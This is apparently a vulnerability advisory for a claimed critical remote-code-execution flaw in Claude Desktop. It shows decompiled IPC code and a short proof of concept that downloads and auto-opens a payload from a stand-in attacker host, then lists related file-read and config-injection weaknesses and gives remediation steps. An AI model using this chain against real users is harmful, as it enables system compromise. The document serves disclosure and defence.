Share
## https://sploitus.com/exploit?id=18102E78-0240-5785-9C40-493FCA754ED1
# CVE-2026-PENDING: Claude Desktop Remote Code Execution via Privileged IPC

![Severity](https://img.shields.io/badge/Severity-CRITICAL-red)
![CVSS](https://img.shields.io/badge/CVSS-9.6-critical)
![Platform](https://img.shields.io/badge/Platform-macOS%20%7C%20Windows-blue)

## ๐Ÿ”ด Overview

A critical remote code execution (RCE) vulnerability exists in **Claude Desktop** (version 1.0.1307 and potentially earlier) that allows attackers to execute arbitrary code on user systems through a privileged Inter-Process Communication (IPC) interface.

The vulnerability stems from:
1. **Overly permissive origin validation** trusting `preview.claude.ai` subdomain
2. **Dangerous IPC sink** (`writeFileDownloadAndOpen`) that auto-executes downloaded files
3. **No user confirmation** before file execution

## ๐ŸŽฏ Impact

- โœ… **Remote Code Execution**: Full system compromise
- โœ… **Data Exfiltration**: Access to local files via exposed IPC methods
- โœ… **Persistence**: Malicious MCP server injection
- โœ… **Zero-Click (with XSS)**: No user interaction beyond visiting a page

**CVSS 3.1 Score:** 9.6 (CRITICAL)  
**Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`

## ๐Ÿ”ฌ Technical Details

### Vulnerable Code

**File:** `index.js` (Main Process)

```javascript
writeFileDownloadAndOpen:async function(r,a){
    const s=new URL(a);
    if(!ts(s.host))return;
    const o=await(await de.net.fetch(a)).bytes();
    // ... saves file to path m ...
    await de.shell.openPath(m);  // โš ๏ธ AUTO-EXECUTES FILE
}
```

### Flawed Origin Validation

```javascript
function vt(t){
    const e=new URL(t.senderFrame.url);
    return !!(
        e.origin==="https://claude.ai"||
        e.origin==="https://preview.claude.ai"||  // โš ๏ธ VULNERABLE
        e.origin==="https://claude.com"||
        e.origin==="https://preview.claude.com"   // โš ๏ธ VULNERABLE
    )
}
```

### Exposed to Renderer

```javascript
// Accessible from JavaScript in trusted origins
window['claude.web'].FileSystem.writeFileDownloadAndOpen(filename, url)
```

## ๐Ÿ’ฃ Proof of Concept

### Scenario: XSS on preview.claude.ai

```javascript
// Attacker achieves XSS on preview.claude.ai
const fs = window['claude.web'].FileSystem;

// Download and execute malicious payload
await fs.writeFileDownloadAndOpen(
    'update.dmg',
    'https://attacker.com/malware.dmg'
);

// File is automatically downloaded to ~/Downloads and executed
// No user confirmation required!
```

### Attack Flow

```
1. Attacker finds XSS on preview.claude.ai
2. User visits malicious page (e.g., via phishing)
3. JavaScript calls window['claude.web'].FileSystem.writeFileDownloadAndOpen()
4. Malicious file downloaded to ~/Downloads
5. shell.openPath() auto-executes the file
6. System compromised
```

## ๐Ÿ›ก๏ธ Affected Versions

- **Claude Desktop 1.0.1307** (confirmed)
- Potentially all versions with the `claude.web.FileSystem` interface

## ๐Ÿ”ง Remediation

### Immediate Actions

1. **Remove preview domains from trusted origins**
   ```javascript
   // Remove these lines from vt() function:
   e.origin==="https://preview.claude.ai"||
   e.origin==="https://preview.claude.com"||
   ```

2. **Disable auto-execution**
   ```javascript
   // Replace shell.openPath() with user confirmation dialog
   const {response} = await dialog.showMessageBox({
       type: 'warning',
       message: 'Open downloaded file?',
       buttons: ['Open', 'Cancel']
   });
   if (response === 0) await shell.openPath(m);
   ```

3. **Implement file validation**
   - Whitelist allowed file extensions
   - Verify file signatures
   - Scan with antivirus before execution

### Long-term Solutions

- Conduct full security audit of all IPC handlers
- Implement principle of least privilege
- Add Content Security Policy
- Remove unnecessary privileged IPC methods

## ๐Ÿ“Š Timeline

- **2026-01-23**: Vulnerability discovered through source code analysis
- **2026-01-23**: CVE request prepared
- **[Pending]**: Vendor notification
- **[Pending]**: Public disclosure (90 days after vendor notification)

## ๐Ÿ” Additional Vulnerabilities

This research also identified:
- `readOpenDocumentAsBase64`: Allows reading arbitrary local files
- Weak MCP server validation: Potential for config injection
- Deep link handler issues: Possible navigation bypass

## โš ๏ธ Disclaimer

This research is provided for educational and defensive security purposes only. The PoC is intentionally incomplete to prevent malicious use. Responsible disclosure practices are being followed.

## ๐Ÿ“ References

- [CVE Request Form](./CVE_REQUEST_CLAUDE_DESKTOP_RCE.md)
- [Detailed Technical Analysis](./TECHNICAL_ANALYSIS.md)
- [Electron Security Best Practices](https://www.electronjs.org/docs/latest/tutorial/security)

## ๐Ÿ‘ค Researcher

**Discovered by:** [Your Name/Handle]  
**Contact:** [Your Email/Twitter]  
**Date:** January 23, 2026

---

**Status:** ๐Ÿ”ด UNPATCHED - Zero-Day Vulnerability